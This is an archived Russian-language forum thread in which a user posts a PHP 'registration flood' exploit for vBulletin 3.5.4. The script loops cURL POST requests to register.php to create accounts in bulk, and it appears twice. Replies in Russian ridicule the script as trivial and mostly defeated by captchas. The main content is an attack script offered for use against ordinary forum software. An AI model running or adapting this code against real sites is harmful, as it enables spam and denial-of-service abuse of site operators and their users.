PDA

Просмотр полной версии : vBulletin 3.5.4 flooder.


Mo4x
16.08.2007, 20:58
####################### vBulletin Version 3.5.4 #########################
Script : vBulletin Version 3.5.4
site : www.vbulletin.com
Exploit by : x-boy
E-mail : Dicomdk@gmail.com
Type : Registration flood in register.php
Thanks to : Simo64
################################################## #######################
Code of exploit (For english version , you can change it to other language)=> exploit.php
cURL Must be activated (http://curl.haxx.se)
Sorry for my bad English :-)
################################################## #######################
<?
set_time_limit(60);
//You can change 10 to other numbers
for($i = 1 ; $i <= 10 ; $i++)
{
//to put curl to send POST request
$ch = curl_init();
//change http://localhost/vb3 to the url of the script
curl_setopt($ch , CURLOPT_URL , 'http://localhost/vb3/register.php');
curl_setopt($ch , CURLOPT_POST , 1) ;
curl_setopt($ch , CURLOPT_POSTFIELDS , 'agree=1&s=&do=addmember&url=index.php&password_md5=&passwordconfirm_md5=&day=0&month=0&year=0&username=x-boy'.$i.'&password=elmehdi&passwordconfirm=elmehdi&email=dicomdk'.$i.'@gmail.com&emailconfirm=dicomdk'.$i.'@gmail.com&referrername=&timezoneoffset=(GMT -12:00) Eniwetok, Kwajalein&dst=DST corrections always on&options[showemail]=1');
curl_exec($ch);
curl_close($ch);
}
//Flood finished good luck
?>
################################################## ########################





<?
set_time_limit(60);
//You can change 10 to other numbers
for($i = 1 ; $i <= 10 ; $i++)
{
//to put curl to send POST request
$ch = curl_init();
//change http://localhost/vb3 to the url of the script
curl_setopt($ch , CURLOPT_URL , 'http://localhost/vb3/register.php');
curl_setopt($ch , CURLOPT_POST , 1) ;
curl_setopt($ch , CURLOPT_POSTFIELDS , 'agree=1&s=&do=addmember&url=index.php&password_md5=&passwordconfirm_md5=&day=0&month=0&year=0&username=x-boy'.$i.'&password=elmehdi&passwordconfirm=elmehdi&email=dicomdk'.$i.'@gmail.com&emailconfirm=dicomdk'.$i.'@gmail.com&referrername=&timezoneoffset=(GMT -12:00) Eniwetok, Kwajalein&dst=DST corrections always on&options[showemail]=1');
curl_exec($ch);
curl_close($ch);
}
//Flood finished good luck
?>


This isn't a perl script, the script si coded in php language :)

GreenBear
16.08.2007, 21:07
мде...
крутые личности... какие флудеры пишут... просто гениально...

Mo4x
16.08.2007, 21:12
мде...
крутые личности... какие флудеры пишут... просто гениально...

-Ммм ну не всеже мы как ты гениальны.

fucker"ok
16.08.2007, 21:12
Даже не знаю что сказать... Кроме как бугага, больше ничего не приходит в голову.
Вообщем художественная самодеятельность какая-то, а не флудер. (имхо)

GreenBear
16.08.2007, 21:19
-Ммм ну не всеже мы как ты гениальны.
во первых, этот "флудер" работать почти везде не будет. надеюсь объяснять почему не надо.
во вторых, раз уж автор хотел сделать код очень маленький и без всякого смысла, то можно было обойтись одной строкой, а не выпендриваться, как он умеет читать мануалы на пхп.нет
в третьих, в чем разница между 1 и 2, кроме как копирайтов в 7 раз больше кода?

This isn't a perl script, the script si coded in php language
ааааа! в начале не прочел, долго не мог понять почему перл так безбожно меня материт!

беру все свои слова назад.

C!klodoL
16.08.2007, 21:27
одно название флудер, сейчас ни встретишь ни одного форума где нет капчи, может мне выложить скрипт которым я засекаю время когда варю пельмени?

GreenBear
16.08.2007, 21:30
одно название флудер, сейчас ни встретишь ни одного форума где нет капчи, может мне выложить скрипт которым я засекаю время когда варю пельмени?
давай, а то заколебался уже с калькулятором вычислять его.